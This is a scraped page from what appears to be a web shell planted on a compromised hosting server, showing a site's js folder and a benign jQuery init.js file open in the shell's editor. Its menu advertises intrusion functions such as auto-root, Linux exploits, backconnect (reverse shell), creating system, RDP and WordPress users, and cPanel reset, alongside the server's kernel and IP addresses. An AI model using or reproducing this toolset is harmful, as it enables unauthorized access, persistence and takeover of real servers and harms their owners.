Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.217.2
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
contract.tradesense.co.ke /
style /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
tinymce
[ DIR ]
drwxr-xr-x
init.js
1.69
KB
-rw-r--r--
jquery.dataTables.js
449.43
KB
-rw-r--r--
materialize.js
268.02
KB
-rw-r--r--
materialize.min.js
123.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : init.js
(function($){ $(function(){ $('.button-collapse').sideNav(); $('.dropdown-button').dropdown({ hover: true, // Activate on hover gutter: 0, // Spacing from edge belowOrigin: true, // Displays dropdown below the button alignment: 'right' // Displays dropdown with edge aligned to the left of button } ); $('.download-button').dropdown({ hover: true, // Activate on hover gutter: 0, // Spacing from edge belowOrigin: true, // Displays dropdown below the button alignment: 'right' // Displays dropdown with edge aligned to the left of button } ); $('.modal-trigger').leanModal(); $('select').material_select(); $('.tooltipped').tooltip({delay: 10}); $('.deleteitem').click(function(){ if(confirm("Are you sure you want to delete this item?")){ var row = $('#dataTable').DataTable().row( $(this).parents('tr') ); row.remove().draw(); $.ajax({ url: 'inc/App.php?actions=delete', type: 'POST', dataType: 'html', data: {table: $(this).data('table'),id: $(this).data('id')}, }) .done(function() { Materialize.toast('The item has been deleted', 4000) // 4000 is the duration of the toast //firework.launch('The item has been deleted', 'success'); }) .fail(function() { console.log("error"); }) .always(function() { console.log("complete"); }); } }); $(window).on('beforeunload', function(){ $("#preloader").show(); }); $( window ).unload(function() { $("#preloader").show(); }); }); // end of document ready })(jQuery); // end of jQuery name space
Close